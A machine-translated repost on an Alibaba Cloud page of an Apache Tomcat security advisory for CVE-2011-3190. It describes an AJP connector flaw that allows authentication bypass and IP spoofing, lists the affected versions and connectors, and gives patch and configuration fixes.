Home > Cloud Computing > Cloud Security

Serious security vulnerabilities in Apache Tomcat

Source: Internet
Author: User
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

Apache Tomcat once again exposes a security vulnerability: 

Vulnerability:CVE-2011-3190 Apache Tomcat bypass verification and Information Leakage 
Severity:Severe 
Publisher: Apache Software Foundation 
Affected Versions: 

  • Tomcat 7.0.0 ~ All 7.0.20 versions
  • Tomcat 6.0.0 ~ All versions of 6.0.33
  • Tomcat 5.5.0 ~ All versions 5.5.33
  • Earlier versions that no longer provide support may also be affected.
Apache Tomcat supports the AJP protocol to reverse proxy requests to Tomcat and related data. The role of the AJP protocol is that when a request contains a request body, an unauthorized AJP message containing the first part (or possibly all) of the Request body is sent to Tomcat. In some cases, Tomcat treats the message as a new request instead of a request body. This may cause the attacker to completely control the AJP message and allow the attacker: 

  • Insert the name of the verified user
  • Insert IP addresses of any client (may bypass filtering of any client IP addresses)
  • Resulting in chaotic responses between users
The following AJP Connector implementationNot affected: 

  • Org. apache. jk. server. JkCoyoteHandler (5.5.x-default, 6.0.x-default)
The following AJP Connector implementationWill be affected: 

  • Org. apache. coyote. ajp. AjpProtocol (6.0.x, 7.0.x-default)
  • Org. apache. coyote. ajp. AjpNioProtocol (7.0.x)
  • Org. apache. coyote. ajp. AjpAprProtocol (5.5.x, 6.0.x, 7.0.x)
In addition, this problem only applies to the following situations: 

  • POST request accepted
  • Request body not processed
Example: see Https://issues.apache.org/bugzilla/show_bug.cgi? Id = 51698 

Solution: 

  • Upgrade Apache Tomcat to the version that has fixed the problem.
  • Install the corresponding patch:-7.0.x Http://svn.apache.org/viewvc? Rev. = 1162958 & view = rev 
    -6.0.x Http://svn.apache.org/viewvc? Rev. = 1162959 & view = rev 
    -5.5.x Http://svn.apache.org/viewvc? Rev. = 1162960 & view = rev
  • Configure the reverse proxy and Tomcat AJP Connector, and use the requiredSecret attribute.
  • Use the org. apache. jk. server. JkCoyoteHandler AJP Connector (not applicable to Tomcat 7.0.x)
VIA Apache.org 

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More